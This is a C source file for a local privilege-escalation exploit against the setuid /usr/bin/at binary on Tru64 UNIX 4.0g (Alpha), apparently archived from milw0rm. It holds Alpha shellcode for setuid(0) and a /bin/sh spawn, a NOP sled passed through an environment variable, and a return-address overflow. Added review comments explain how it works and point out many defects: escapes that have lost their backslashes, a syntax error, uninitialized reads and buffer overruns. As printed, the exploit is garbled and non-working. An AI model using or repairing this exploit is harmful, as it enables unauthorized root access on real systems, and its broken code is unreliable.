/*
* Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
*
* Author: Cody Tubbs (loophole of hhp).
* Site: www.hhp-programming.net
* Email: [email protected]
* Date: 2/1/2000.
*
* I made this without access to gdb, It's untested...
* may require modification, may require deletion, heh.
*
* Note: executable_stack must be on.
*/
#include <stdio.h>
#include <string.h>
#define OFFSET 0 /* default stack-pointer offset when none is given on the command line */
#define ALLIGN 0 /* default byte alignment (usage() documents 0..3) of the address pattern */
#define NOP "x1fx04xffx47" /* one Alpha NOP word; only referenced from a commented-out line in main() */
#define DBUF 8000 // 5604+4+528? Manipulate if needed.
/* Payload that main() appends to the "ATEX=" environment string. The original
 * comment describes it as an Alpha setuid(0) + execl("/bin/sh","sh",0)
 * sequence attributed to Taeho Oh.
 * NOTE(review): in this listing every "\x" escape has lost its backslash
 * (x30x15... instead of the byte form), as have the "\n" escapes in the
 * fprintf strings below, so as printed this initializer is plain ASCII text
 * rather than the byte values the comment describes. */
char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
"x30x15xd9x43x11x74xf0x47x12x14x02x42xfcxffx32"
"xb2x12x94x09x42xfcxffx32xb2xffx47x3fx26x1fx04"
"x31x22xfcxffx30xb2xf7xffx1fxd2x10x04xffx47x11"
"x14xe3x43x20x35x20x42xffxffxffxff"
"x30x15xd9x43x31x15xd8x43x12x04xffx47x40xffx1e"
"xb6x48xffxfexb7x98xffx7fx26xd0x8cx73x22x13x05"
"xf3x47x3cxffx7exb2x69x6ex7fx26x2fx62x73x22x38"
"xffx7exb2x13x94xe7x43x20x35x60x42xffxffxffxff";
//Taeho Oh shellcode.
/* Stack-pointer probe (inline asm) left commented out by the author; main()
 * likewise only references get_sp() from a commented-out line. */
//long get_sp(void){ __asm__("bis $31,$30,$0");}
void usage(char *arg) {
/* Prints the banner and argument syntax to stderr, then exits with status 1.
 * arg: argv[0], echoed into the usage and example lines.
 * Review notes: the "\n" escapes in these strings appear with their
 * backslash lost (a bare "n" is printed instead of a newline); the second
 * fprintf below is missing its closing parenthesis, so the file does not
 * compile as shown; exit() is called with no <stdlib.h> include, which
 * C99 and later reject as an implicit declaration. */
fprintf(stderr, "nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
fprintf(stderr, " local root exploit. [ALPHA] n"; /* unbalanced: closing ')' missing */
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", arg);
fprintf(stderr, "Examp: %s 0n", arg);
fprintf(stderr, "Examp: %s 0 1n", arg);
exit(1);
}
main(int argc, char **argv){
/* Entry point. Prepares two attacker-controlled inputs for the setuid
 * /usr/bin/at binary and then execs it:
 *   - eipeip: the single command-line argument, filled with copies of a
 *     guessed stack address (the value meant to end up in the overflowed
 *     frame's saved return address, printed as "Return address" below);
 *   - buffer:  an environment variable "ATEX=" whose value is a run of
 *     Alpha NOP words followed by the shellcode array.
 * The file header states executable_stack must be on: with a
 * non-executable stack the jump into the environment string faults
 * instead of running the payload, which is the mitigation this depends on.
 * Implicit-int main (pre-C99 style) with no return statement; atoi, exit,
 * putenv and execlp are used without <stdlib.h>/<unistd.h>, so C99 and
 * later reject the implicit declarations. */
char eipeip[DBUF], buffer[4096], heh[DBUF+1]; /* heh is declared but never used */
char *nop;
int i, offset, allign;
long address;
if(argc < 2){
usage(argv[0]);
}
/* offset and allign are taken from argv with no range check; usage()
 * documents allign as 0..3, but a negative value would start the stride
 * loop below at an index before eipeip. */
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
//address = get_sp() - offset;
/* Syntactically this is `i & -offset`, but i is still uninitialized here,
 * so the read is undefined behavior. The commented-out line above (and the
 * commented-out get_sp() near the top of the file) show that a
 * stack-pointer probe minus the offset was intended. */
address = i& - offset;
/* Pre-fill with 0x69, only when allign > 0 — presumably so the leading
 * bytes the stride loop skips are defined; with allign == 0 nothing is
 * pre-filled. */
if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
/* Store the address at every 4th byte. With an 8-byte long (LP64) the
 * stores overlap, every other one is misaligned if eipeip is 8-byte
 * aligned, and the final iteration (i >= DBUF-4) writes past the end of
 * eipeip. eipeip is never NUL-terminated, yet strlen(eipeip) is used in
 * the loop bound below and the array is passed to execlp as a C string. */
for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
nop=NOP; /* assigned but unused: the NOP bytes are written by hand below */
/* NOP sled. The body advances i four times per iteration, so the
 * condition is checked only every 4 bytes. The bound is a size_t
 * expression compared against int i; if 4096 < strlen(shellcode) +
 * strlen(eipeip) the subtraction wraps and the loop overruns buffer. */
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
//buffer[i]=nop[i%4];
buffer[i] = 0x1f;
buffer[++i] = 0x04;
buffer[++i] = 0xff;
buffer[++i] = 0x47;
}
/* Append the payload without its terminating NUL (buffer is never
 * NUL-terminated, and the bytes after the copy are indeterminate), then
 * overwrite the first 5 bytes with the variable name so putenv() sees
 * "ATEX=...". putenv() keeps a pointer to buffer rather than copying it,
 * which only works here because exec follows immediately. */
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"ATEX=",5);
putenv(buffer);
/* %#x is given a long argument — a format/type mismatch on LP64 (%#lx);
 * the "\n" escape has also lost its backslash in this listing. */
fprintf(stderr,"Return address %#x, offset: %d.n",address,offset);
/* The variadic list is terminated with a plain int 0 rather than
 * (char *)0; on an LP64 target that is not guaranteed to be read as a
 * null pointer. */
execlp("/usr/bin/at","at", eipeip, 0);
}
// milw0rm.com [2001-03-02]